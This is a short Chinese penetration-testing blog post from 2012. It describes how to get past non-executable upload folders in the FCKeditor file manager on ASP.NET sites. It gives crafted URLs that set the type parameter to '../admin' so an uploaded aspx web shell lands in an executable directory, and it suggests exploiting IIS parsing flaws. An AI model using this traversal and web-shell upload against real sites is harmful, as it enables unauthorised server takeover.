您的位置 » 首页 » 渗透测试 » 有fckeditor突破目录执行权限问题

有fckeditor突破目录执行权限问题

发表于5年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2012年06月27日 | 文章热度:4,818 次 全屏阅读

显示不全请点击全屏阅读

例如这样一个站

http://www.xxxxxx.com/admin/fckeditor/editor/filemanager/browser/default/browser.html?type=monyer&connector=connectors/aspx/connector.aspx

可以直接上传aspx的大马

但是当你查看路径去尝试运行的时候却发现出不来

This Virtual Directory does not allow objects to be executed.此虚拟目录不允许执行的对象。

再看另一个上传

http://www.xxxxxx.com/admin/fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/aspx/connector.aspx

看了一下  可以发现

一个是  type=monyer

另一个是 type=image

把type=修改 type=../admin

怎么样

http://www.xxxxx.com/admin/fckeditor/editor/filemanager/browser/default/browser.html?type=../admin&connector=connectors/aspx/connector.aspx

没想到爆文件了  直接上传 

大家看一下   可以利用 iis解析嘛

Tags:

fckeditor漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/406/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有1个筒子留下了脚印...

  • kk 说:
    1楼
    2013 年 3 月 31 日 下午 1:43 回复

    这个是不是只有某些特殊的网站才可以啊

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)